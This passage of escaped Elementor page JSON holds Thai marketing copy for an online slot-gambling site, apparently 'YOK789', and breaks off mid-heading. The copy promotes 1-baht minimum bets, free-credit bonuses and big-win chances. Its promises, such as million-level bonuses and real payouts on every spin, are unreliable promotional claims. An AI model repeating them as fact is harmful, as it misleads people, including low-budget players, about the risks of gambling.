\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK 